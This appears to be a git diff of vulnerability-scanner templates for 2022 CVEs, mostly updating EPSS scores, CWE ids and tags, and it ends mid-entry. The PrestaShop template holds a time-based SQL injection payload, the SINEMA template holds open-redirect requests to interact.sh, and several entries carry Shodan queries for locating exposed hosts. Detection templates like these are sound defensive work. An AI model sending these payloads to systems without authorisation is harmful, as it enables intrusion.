a/http/cves/2022/CVE-2022-2185.yaml b/http/cves/2022/CVE-2022-2185.yaml index b2c4afd169..58d43810b8 100644 --- a/http/cves/2022/CVE-2022-2185.yaml +++ b/http/cves/2022/CVE-2022-2185.yaml @@ -15,9 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-2185 - cwe-id: CWE-732 - epss-score: 0.41002 + cwe-id: CWE-78 + epss-score: 0.46606 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* + epss-percentile: 0.96958 metadata: max-request: 1 shodan-query: http.title:"GitLab" diff --git a/http/cves/2022/CVE-2022-2187.yaml b/http/cves/2022/CVE-2022-2187.yaml index 796bdbb2ce..147690bba8 100644 --- a/http/cves/2022/CVE-2022-2187.yaml +++ b/http/cves/2022/CVE-2022-2187.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2187 cwe-id: CWE-79 - epss-score: 0.00078 + epss-score: 0.00119 cpe: cpe:2.3:a:contact_form_7_captcha_project:contact_form_7_captcha:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45304 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml index 563d6c81e3..a90ed34b01 100644 --- a/http/cves/2022/CVE-2022-2219.yaml +++ b/http/cves/2022/CVE-2022-2219.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-2219 cwe-id: CWE-79 - epss-score: 0.00117 + epss-score: 0.00179 cpe: cpe:2.3:a:brizy:unyson:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.5437 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index 8796333217..9da34e544c 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-22242 cwe-id: CWE-79 - epss-score: 0.43398 + epss-score: 0.40304 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* + epss-percentile: 0.96776 metadata: max-request: 1 shodan-query: title:"Juniper Web Device Manager" diff --git a/http/cves/2022/CVE-2022-22536.yaml b/http/cves/2022/CVE-2022-22536.yaml index c1d3bd37f5..1d87af4af2 100644 --- a/http/cves/2022/CVE-2022-22536.yaml +++ b/http/cves/2022/CVE-2022-22536.yaml @@ -16,8 +16,9 @@ info: cvss-score: 10 cve-id: CVE-2022-22536 cwe-id: CWE-444 - epss-score: 0.96734 + epss-score: 0.96538 cpe: cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:* + epss-percentile: 0.99422 metadata: max-request: 2 shodan-query: http.favicon.hash:-266008933 diff --git a/http/cves/2022/CVE-2022-22733.yaml b/http/cves/2022/CVE-2022-22733.yaml index e9436f1aeb..6273f5e0c1 100644 --- a/http/cves/2022/CVE-2022-22733.yaml +++ b/http/cves/2022/CVE-2022-22733.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.5 cve-id: CVE-2022-22733 cwe-id: CWE-200 - epss-score: 0.19684 + epss-score: 0.28675 cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:* + epss-percentile: 0.96259 metadata: max-request: 1 shodan-query: http.favicon.hash:816588900 diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index c5eefc9fb6..50b93880dd 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -15,11 +15,17 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22897 cwe-id: CWE-89 + epss-score: 0.03722 + cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:* + epss-percentile: 0.90593 metadata: max-request: 2 shodan-query: http.component:"Prestashop" verified: true - tags: cve,cve2022,prestashop,sqli,unauth + framework: prestashop + vendor: apollotheme + product: ap_pagebuilder + tags: packetstorm,cve,cve2022,prestashop,sqli,unauth http: - raw: @@ -31,7 +37,6 @@ http: X-Requested-With: XMLHttpRequest leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0) - - | GET /modules/appagebuilder/config.xml HTTP/1.1 Host: {{Hostname}} @@ -44,7 +49,6 @@ http: group: 1 regex: - "\\s*\\s*<\\/version>" - matchers: - type: dsl dsl: diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml index 9bff9ed631..79b9c0b6da 100644 --- a/http/cves/2022/CVE-2022-2290.yaml +++ b/http/cves/2022/CVE-2022-2290.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2290 cwe-id: CWE-79 - epss-score: 0.001 + epss-score: 0.00112 cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:* + epss-percentile: 0.43971 metadata: max-request: 3 shodan-query: title:"Trilium Notes" diff --git a/http/cves/2022/CVE-2022-22947.yaml b/http/cves/2022/CVE-2022-22947.yaml index 8a649e398b..bbd49f3cd1 100644 --- a/http/cves/2022/CVE-2022-22947.yaml +++ b/http/cves/2022/CVE-2022-22947.yaml @@ -15,9 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2022-22947 - cwe-id: CWE-94 - epss-score: 0.97552 + cwe-id: CWE-917,CWE-94 + epss-score: 0.9754 cpe: cpe:2.3:a:vmware:spring_cloud_gateway:*:*:*:*:*:*:*:* + epss-percentile: 0.99989 metadata: max-request: 3 vendor: vmware diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index 062f70d8ac..6d4ace7ffa 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22954 cwe-id: CWE-94 - epss-score: 0.97526 + epss-score: 0.97532 cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* + epss-percentile: 0.99985 metadata: max-request: 1 shodan-query: http.favicon.hash:-1250474341 diff --git a/http/cves/2022/CVE-2022-22963.yaml b/http/cves/2022/CVE-2022-22963.yaml index 7b54515327..cb6746ec22 100644 --- a/http/cves/2022/CVE-2022-22963.yaml +++ b/http/cves/2022/CVE-2022-22963.yaml @@ -18,8 +18,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22963 cwe-id: CWE-917,CWE-94 - epss-score: 0.97472 + epss-score: 0.97452 cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:* + epss-percentile: 0.99924 metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2022/CVE-2022-22965.yaml b/http/cves/2022/CVE-2022-22965.yaml index f437ca9952..771b343b2b 100644 --- a/http/cves/2022/CVE-2022-22965.yaml +++ b/http/cves/2022/CVE-2022-22965.yaml @@ -19,8 +19,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22965 cwe-id: CWE-94 - epss-score: 0.97521 + epss-score: 0.97502 cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* + epss-percentile: 0.99964 metadata: max-request: 4 vendor: vmware diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml index 726bec8455..1641cdb382 100644 --- a/http/cves/2022/CVE-2022-22972.yaml +++ b/http/cves/2022/CVE-2022-22972.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-22972 cwe-id: CWE-287 - epss-score: 0.8818 + epss-score: 0.78281 cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* + epss-percentile: 0.97824 metadata: max-request: 3 fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml index fd095d62d8..67d282f1ea 100644 --- a/http/cves/2022/CVE-2022-23102.yaml +++ b/http/cves/2022/CVE-2022-23102.yaml @@ -1,4 +1,5 @@ id: CVE-2022-23102 + info: name: SINEMA Remote Connect Server < V2.0 - Open Redirect author: ctflearner,ritikchaddha @@ -15,18 +16,21 @@ info: cvss-score: 6.1 cve-id: CVE-2022-23102 cwe-id: CWE-601 + epss-score: 0.00434 cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:* + epss-percentile: 0.71407 metadata: max-request: 2 shodan-query: title:"Logon - SINEMA Remote Connect" - tags: cve,cve2022,redirect,sinema,authenticated + vendor: siemens + product: sinema_remote_connect_server + tags: packetstorm,seclists,cve,cve2022,redirect,sinema,authenticated http: - raw: - | GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1 Host: {{Hostname}} - - | POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml index f285528851..a4875a5603 100644 --- a/http/cves/2022/CVE-2022-23131.yaml +++ b/http/cves/2022/CVE-2022-23131.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-23131 cwe-id: CWE-290 - epss-score: 0.97134 + epss-score: 0.97044 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* + epss-percentile: 0.99643 metadata: max-request: 2 fofa-query: app="ZABBIX-监控系统" && body="saml" diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml index 5fe2df7d38..2593b0e73e 100644 --- a/http/cves/2022/CVE-2022-23134.yaml +++ b/http/cves/2022/CVE-2022-23134.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.3 cve-id: CVE-2022-23134 cwe-id: CWE-287,CWE-284 - epss-score: 0.46222 + epss-score: 0.48649 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* + epss-percentile: 0.97026 metadata: max-request: 2 vendor: zabbix diff --git a/http/cves/2022/CVE-2022-2314.yaml b/http/cves/2022/CVE-2022-2314.yaml index 23d1b79c91..cd4a0a5508 100644 --- a/http/cves/2022/CVE-2022-2314.yaml +++ b/http/cves/2022/CVE-2022-2314.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2314 cwe-id: CWE-94 - epss-score: 0.08397 + epss-score: 0.1914 cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.95605 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-23178.yaml b/http/cves/2022/CVE-2022-23178.yaml index 4c59f6ea01..bd8f5a768e 100644 --- a/http/cves/2022/CVE-2022-23178.yaml +++ b/http/cves/2022/CVE-2022-23178.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-23178 cwe-id: CWE-287 - epss-score: 0.03195 + epss-score: 0.03228 cpe: cpe:2.3:o:crestron:hd-md4x2-4k-e_firmware:1.0.0.2159:*:*:*:*:*:*:* + epss-percentile: 0.89951 metadata: max-request: 1 vendor: crestron diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml index 3c3489d422..a505be7c3f 100644 --- a/http/cves/2022/CVE-2022-23347.yaml +++ b/http/cves/2022/CVE-2022-23347.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-23347 cwe-id: CWE-22 - epss-score: 0.10923 + epss-score: 0.10291 cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* + epss-percentile: 0.94201 metadata: max-request: 1 shodan-query: http.html:"BigAnt" diff --git a/http/cves/2022/CVE-2022-23348.yaml b/http/cves/2022/CVE-2022-23348.yaml index 4b99f9b580..c0d3cf0af8 100644 --- a/http/cves/2022/CVE-2022-23348.yaml +++ b/http/cves/2022/CVE-2022-23348.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.3 cve-id: CVE-2022-23348 cwe-id: CWE-916 - epss-score: 0.00369 + epss-score: 0.00323 cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* + epss-percentile: 0.66903 metadata: max-request: 1 shodan-query: http.html:"bigant" diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml index d49d56fb21..32e3a7a2bf 100644 --- a/http/cves/2022/CVE-2022-23544.yaml +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-918,CWE-79 epss-score: 0.00059 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* + epss-percentile: 0.22776 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2022/CVE-2022-2373.yaml b/http/cves/2022/CVE-2022-2373.yaml index 97e0653598..1aa6d765ac 100644 --- a/http/cves/2022/CVE-2022-2373.yaml +++ b/http/cves/2022/CVE-2022-2373.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2373 cwe-id: CWE-862 - epss-score: 0.00482 + epss-score: 0.00401 cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.70313 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-2376.yaml b/http/cves/2022/CVE-2022-2376.yaml index 261cc67b8b..d8cd3cf95a 100644 --- a/http/cves/2022/CVE-2022-2376.yaml +++ b/http/cves/2022/CVE-2022-2376.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2376 cwe-id: CWE-862 - epss-score: 0.07857 + epss-score: 0.0701 cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.93088 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml index 8fb5e32810..6f8ce39e83 100644 --- a/http/cves/2022/CVE-2022-23779.yaml +++ b/http/cves/2022/CVE-2022-23779.yaml @@ -14,8 +14,9 @@ info: cvss-score: 5.3 cve-id: CVE-2022-23779 cwe-id: CWE-200 - epss-score: 0.00641 + epss-score: 0.0089 cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:* + epss-percentile: 0.80566 metadata: max-request: 1 fofa-query: app="ZOHO-ManageEngine-Desktop" diff --git a/http/cves/2022/CVE-2022-2379.yaml b/http/cves/2022/CVE-2022-2379.yaml index 04bf5c85ab..6009cad5bd 100644 --- a/http/cves/2022/CVE-2022-2379.yaml +++ b/http/cves/2022/CVE-2022-2379.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-2379 cwe-id: CWE-862 - epss-score: 0.01743 + epss-score: 0.02717 cpe: cpe:2.3:a:easy_student_results_project:easy_student_results:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.89157 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml index aed5fd03d2..c91a8c0d4f 100644 --- a/http/cves/2022/CVE-2022-23808.yaml +++ b/http/cves/2022/CVE-2022-23808.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-23808 cwe-id: CWE-79 - epss-score: 0.00292 + epss-score: 0.00238 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* + epss-percentile: 0.6117 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index f868d6b2c4..b312693833 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2383 cwe-id: CWE-79 - epss-score: 0.00071 + epss-score: 0.00097 cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.39802 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index 3a2cf56f0a..291958317b 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-23854 - cwe-id: CWE-23,CWE-22 - epss-score: 0.87202 + cwe-id: CWE-22,CWE-23 + epss-score: 0.88121 cpe: cpe:2.3:a:aveva:intouch_access_anywhere:*:*:*:*:*:*:*:* + epss-percentile: 0.98247 metadata: max-request: 1 shodan-query: http.html:"InTouch Access Anywhere" diff --git a/http/cves/2022/CVE-2022-23881.yaml b/http/cves/2022/CVE-2022-23881.yaml index 632c421094..b57fa95fb5 100644 --- a/http/cves/2022/CVE-2022-23881.yaml +++ b/http/cves/2022/CVE-2022-23881.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-77 epss-score: 0.29422 cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:* + epss-percentile: 0.96308 metadata: max-request: 1 vendor: zzzcms diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml index fb98f34b8b..cdf30a7a36 100644 --- a/http/cves/2022/CVE-2022-23898.yaml +++ b/http/cves/2022/CVE-2022-23898.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-23898 cwe-id: CWE-89 - epss-score: 0.01144 + epss-score: 0.01029 cpe: cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:* + epss-percentile: 0.81996 metadata: max-request: 1 fofa-query: icon_hash="1464851260" diff --git a/http/cves/2022/CVE-2022-23944.yaml b/http/cves/2022/CVE-2022-23944.yaml index f44860b93f..2ebf60cd06 100644 --- a/http/cves/2022/CVE-2022-23944.yaml +++ b/http/cves/2022/CVE-2022-23944.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.1 cve-id: CVE-2022-23944 cwe-id: CWE-306,CWE-862 - epss-score: 0.36269 + epss-score: 0.65738 cpe: cpe:2.3:a:apache:shenyu:2.4.0:*:*:*:*:*:*:* + epss-percentile: 0.97456 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2022/CVE-2022-24112.yaml b/http/cves/2022/CVE-2022-24112.yaml index ae9b6ec3bf..809d3c46d0 100644 --- a/http/cves/2022/CVE-2022-24112.yaml +++ b/http/cves/2022/CVE-2022-24112.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24112 cwe-id: CWE-290 - epss-score: 0.97225 + epss-score: 0.97343 cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* + epss-percentile: 0.99829 metadata: max-request: 2 fofa-query: title="Apache APISIX Dashboard" diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index cfb668945d..7f829b17d2 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24124 cwe-id: CWE-89 - epss-score: 0.00374 + epss-score: 0.00846 cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* + epss-percentile: 0.80026 metadata: max-request: 1 product: "casdoor" diff --git a/http/cves/2022/CVE-2022-24129.yaml b/http/cves/2022/CVE-2022-24129.yaml index 7ca82b9312..e14fdb0ce6 100644 --- a/http/cves/2022/CVE-2022-24129.yaml +++ b/http/cves/2022/CVE-2022-24129.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.2 cve-id: CVE-2022-24129 cwe-id: CWE-918 - epss-score: 0.00656 + epss-score: 0.00647 cpe: cpe:2.3:a:shibboleth:oidc_op:*:*:*:*:*:identity_provider:*:* + epss-percentile: 0.76687 metadata: max-request: 1 framework: identity_provider diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml index 6fe2dd7f1e..e7f38a8fc1 100644 --- a/http/cves/2022/CVE-2022-2414.yaml +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -15,11 +15,16 @@ info: cvss-score: 7.5 cve-id: CVE-2022-2414 cwe-id: CWE-611 + epss-score: 0.01359 + cpe: cpe:2.3:a:dogtagpki:dogtagpki:10.5.18:*:*:*:*:*:*:* + epss-percentile: 0.84532 metadata: max-request: 1 fofa-query: title="Identity Management" shodan-query: title:"Identity Management" html:"FreeIPA" verified: true + vendor: dogtagpki + product: dogtagpki tags: cve,cve2022,dogtag,freeipa,xxe http: diff --git a/http/cves/2022/CVE-2022-24181.yaml b/http/cves/2022/CVE-2022-24181.yaml index 3abe674a58..2318a4e7f4 100644 --- a/http/cves/2022/CVE-2022-24181.yaml +++ b/http/cves/2022/CVE-2022-24181.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00131 cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:* + epss-percentile: 0.47237 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml index 9ab0c4cf8a..3f3f8d0a16 100644 --- a/http/cves/2022/CVE-2022-24223.yaml +++ b/http/cves/2022/CVE-2022-24223.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24223 cwe-id: CWE-89 - epss-score: 0.00691 + epss-score: 0.00656 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* + epss-percentile: 0.7689 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml index 5c786c0c43..fdbb196e8e 100644 --- a/http/cves/2022/CVE-2022-24260.yaml +++ b/http/cves/2022/CVE-2022-24260.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24260 cwe-id: CWE-89 - epss-score: 0.60301 + epss-score: 0.39803 cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* + epss-percentile: 0.96763 metadata: max-request: 1 shodan-query: http.title:"VoIPmonitor" diff --git a/http/cves/2022/CVE-2022-24264.yaml b/http/cves/2022/CVE-2022-24264.yaml index c42af556e0..e35945731a 100644 --- a/http/cves/2022/CVE-2022-24264.yaml +++ b/http/cves/2022/CVE-2022-24264.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24264 cwe-id: CWE-89 - epss-score: 0.05498 + epss-score: 0.06436 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* + epss-percentile: 0.9277 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml index e64ecb080f..7cdc8fe80b 100644 --- a/http/cves/2022/CVE-2022-24265.yaml +++ b/http/cves/2022/CVE-2022-24265.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24265 cwe-id: CWE-89 - epss-score: 0.05498 + epss-score: 0.06436 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* + epss-percentile: 0.9277 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml index 65adaa725a..6680dfb397 100644 --- a/http/cves/2022/CVE-2022-24266.yaml +++ b/http/cves/2022/CVE-2022-24266.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24266 cwe-id: CWE-89 - epss-score: 0.04029 + epss-score: 0.04372 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* + epss-percentile: 0.91286 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-24288.yaml b/http/cves/2022/CVE-2022-24288.yaml index b7fce1b7aa..64ddfdd688 100644 --- a/http/cves/2022/CVE-2022-24288.yaml +++ b/http/cves/2022/CVE-2022-24288.yaml @@ -14,8 +14,9 @@ info: cvss-score: 8.8 cve-id: CVE-2022-24288 cwe-id: CWE-78 - epss-score: 0.61988 + epss-score: 0.88109 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* + epss-percentile: 0.98246 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-24384.yaml b/http/cves/2022/CVE-2022-24384.yaml index a76a47a8e9..09e80f7ceb 100644 --- a/http/cves/2022/CVE-2022-24384.yaml +++ b/http/cves/2022/CVE-2022-24384.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-24384 cwe-id: CWE-79 + epss-score: 0.0012 cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:* - epss-score: 0.00079 + epss-percentile: 0.45411 metadata: max-request: 1 product: smartertrack @@ -35,4 +36,4 @@ http: words: - '"type":"error","text":"Unknown survey\">"' - 'smartertrack' - condition: and \ No newline at end of file + condition: and diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml index 2d40f7548f..da49ad6098 100644 --- a/http/cves/2022/CVE-2022-2462.yaml +++ b/http/cves/2022/CVE-2022-2462.yaml @@ -17,8 +17,9 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2462 cwe-id: CWE-200 - epss-score: 0.00712 + epss-score: 0.00881 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.80428 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-2467.yaml b/http/cves/2022/CVE-2022-2467.yaml index cced1b6d65..4dfa12663c 100644 --- a/http/cves/2022/CVE-2022-2467.yaml +++ b/http/cves/2022/CVE-2022-2467.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2467 cwe-id: CWE-89 - epss-score: 0.01501 + epss-score: 0.01423 cpe: cpe:2.3:a:garage_management_system_project:garage_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.84857 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index 22e151d10a..387bceae69 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.0017 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* + epss-percentile: 0.53409 metadata: max-request: 1 vendor: zohocorp diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index 5cf4ae33b1..3205702239 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -18,8 +18,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24716 cwe-id: CWE-22 - epss-score: 0.32737 + epss-score: 0.33311 cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:* + epss-percentile: 0.96475 metadata: max-request: 3 shodan-query: title:"Icinga" diff --git a/http/cves/2022/CVE-2022-24816.yaml b/http/cves/2022/CVE-2022-24816.yaml index c2e2c83f49..33dfa17183 100644 --- a/http/cves/2022/CVE-2022-24816.yaml +++ b/http/cves/2022/CVE-2022-24816.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24816 cwe-id: CWE-94 - epss-score: 0.85856 + epss-score: 0.87795 cpe: cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:* + epss-percentile: 0.98227 metadata: max-request: 1 fofa-query: app="GeoServer" diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml index 843d4142f6..657d1ed329 100644 --- a/http/cves/2022/CVE-2022-24856.yaml +++ b/http/cves/2022/CVE-2022-24856.yaml @@ -19,8 +19,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24856 cwe-id: CWE-918 - epss-score: 0.04251 + epss-score: 0.04747 cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:* + epss-percentile: 0.91616 metadata: max-request: 1 vendor: flyte diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml index e39afcf4b8..a44d421369 100644 --- a/http/cves/2022/CVE-2022-2486.yaml +++ b/http/cves/2022/CVE-2022-2486.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-2486 cwe-id: CWE-78 - epss-score: 0.97366 + epss-score: 0.97265 cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.99771 metadata: max-request: 1 shodan-query: http.title:"Wi-Fi APP Login" diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index af17223743..1e078f8fc2 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: 